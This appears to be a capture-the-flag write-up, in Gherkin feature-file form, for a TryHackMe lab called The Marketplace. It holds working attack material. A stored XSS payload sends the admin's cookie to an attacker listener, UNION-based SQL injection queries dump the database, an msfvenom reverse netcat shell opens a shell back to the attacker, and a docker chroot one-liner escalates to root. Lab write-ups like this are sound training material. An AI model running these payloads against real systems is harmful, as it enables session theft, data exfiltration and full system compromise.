## Version 2.0
## language: en
Feature: starters-www.tryhackme.com
  Site:
    www.tryhackme.com
  Category:
    Starters
  User:
    juan6630
  Goal:
    Retrieve the user and root flags.

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows 10      | 20H2        |
    | kali-linux      | 2020.4      |
    | Mozilla Firefox | 85.0.2      |
    | ZAP             | 2.10.0      |
    | Nmap            | 7.80        |
  Machine information:
    Given I start the challenge with the following IP address
    """
    10.10.151.172
    """
    When I access the machine via VPN

  Scenario: Fail: Source code search
    When I decide to search for information inside the source code
    Then I don't get an interesting result

  Scenario: Success: Identify the vulnerability
    Given I have a website
    When I scan with Nmap
    """
    nmap -A -T4 10.10.151.172 -p-
      PORT      STATE SERVICE VERSION
      22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu
      80/tcp    open  http    nginx 1.19.2
      | http-robots.txt: 1 disallowed entry
      |_/admin
      |_http-server-header: nginx/1.19.2
      |_http-title: The Marketplace
      32768/tcp open  http  Node.js (Express middleware)
      | http-robots.txt: 1 disallowed entry
      |_/admin
      |_http-title: The Marketplace
    """
    Then I checked the website at <<10.10.151.172:80>>
    And I see the marketplace front page
    When I check the two post
    And I can report any post
    And this creates a message from the administrator reviewing my report
    When I check the login page
    Then I create an account with the credentials juan:juan
    When I configure an automated scan in Zed Attack Proxy (ZAP)
    And I run it
    Then I get an alert of cross site scripting [evidence](xss.png)
    When I open the site at <<10.10.151.172/new>> to verify the alert
    And I use the payload
    """
    <script>alert('Testing!')</script>
    """
    Then I get my script executed [evidence](alert.png)

  Scenario: Success: Session hijacking
    Given The site at port 80 is vulnerable to XSS attacks
    When I search for more information about the attack
    And I read the OWASP page of the attack
    """
    https://owasp.org/www-community/attacks/xss/
    """
    Then I know I need to use a cookie grabber
    When I create a listener on my machine with
    """
    nc -lvnp 4422
    """
    And I create a new listing on the website with the following description
    """
    <script>var i=new Image;i.src='http://10.10.109.27:4422/?'
    +document.cookie; </script>
    """
    Then I grab my own cookie
    When I report my own post
    And I run the listener again
    And I click on the messages tab
    Then I grab the admin's cookie
    When I open the inspect element in Firefox
    And I change my session cookie with the admin's one
    Then I see an administration panel
    When I click on it
    Then I see the first flag [evidence](panel.png)
    And I see the users list

  Scenario: Success: SQL injection
    Given A Firefox sessions as the administrator
    When I click on the users
    Then I notice a SQL query on the URL
    """
    10.10.1.194/admin?user=2
    """
    When I change the URL to
    """
    10.10.1.194/admin?user='1=1'
    """
    Then I get the error
    """
    You have an error in your SQL syntax
    Check the manual that corresponds to your MySQL server version
    """
    And I know it's using MySQL
    When I change the URL to
    """
    10.10.1.194/admin?user=2 UNION SELECT 1,2,3,4,5,6,7,8
    """
    Then I get the error
    """
    The used SELECT statements have a different number of columns
    """
    When I progressively reduce the selected columns
    And I fund the correct number at 4
    And I search for MySQL functions at
    """
    https://www.w3schools.com/mysql/mysql_ref_functions.asp
    """
    Then I use
    """
    10.10.1.194/admin?user=2 UNION SELECT version(),database(),3,4
    """
    And I get the name of the database <<marketplace>>
    When I use
    """
    http://10.10.1.194/admin?user=22 UNION SELECT
    group_concat(table_name),database(),3,4 from
    information_schema.tables where table_schema='marketplace'
    """
    Then I get the names of the tables
    """
    items, messages, users
    """
    When I use the following to enumerate each table columns
    """
    http://10.10.1.194/admin?user=0 UNION SELECT
    group_concat(column_name),database(),3,4 from
    information_schema.columns where table_name='items'
    """
    And I get the results
    """
    Table items:
          id, author, title, description, image
    Table messages:
          id, user_from, user_to, message_content, is_read
    Table users:
          id, username, password, isAdministrator
    """
    Then I try to retrieve the admins password with
    """
    http://10.10.1.194/admin?user=22 UNION SELECT
    group_concat(password),2,3,4 from users where id='2'
    """
    But The password is stored as a hash
    And I was not able to decrypt it
    When I try to see the content of the messages with
    """
    http://10.10.1.194/admin?user=0 UNION SELECT
    group_concat(user_to, message_content),2,3,4 from messages
    """
    Then I get an SSH password to login at port 22 [evidence](sshpass.png)
    And The users ID 3 to 'jake'

  Scenario: Success: SSH connection
    Given The port 22 is open
    And The password to login as jake
    When I use the following command at my terminal
    """
    ssh jake@10.10.1.194
    """
    And I use the given password
    Then I login as jake
    And I get the user flag [evidence](userflag.png)

  Scenario: Success: Privilege escalation
    Given An SSH session as jake
    When I check the user privileges with <<sudo -l>>
    """
    jake@the-marketplace:~$ sudo -l
    Matching Default entries for jake on the-marketplace:
        env_reset, mail_badpass,
    User jake may run the following commands on the-marketplace:
        (michael) NOPASSWD: /opt/backups/backup.sh
    """
    And I use <<cat /opt/backups/backup.sh>>
    """
    #!/bin/bash
    echo 'Backing up files....';
    tar cf /opt/backups/backup.tar *
    """
    Then I switch to Kali
    And I do the SSH log again
    When I create a reverse shell payload with
    """
    msfvenom -p cmd/unix/reverse_netcat lhost=10.2.74.146 lport=1234 R
    """
    And I upload the result with my SSH session
    Then I get a netcat shell as michael [evidence](nc.png)
    When I search for docker privilege escalation
    And I check the GTFOBins
    """
    https://gtfobins.github.io/gtfobins/docker/
    """
    And I use
    """
    docker run -v /:/mnt --rm -it alpine chroot /mnt sh
    """
    Then I get a shell as root
    And I get the root flag [evidence](root.png)
    And I solve the challenge
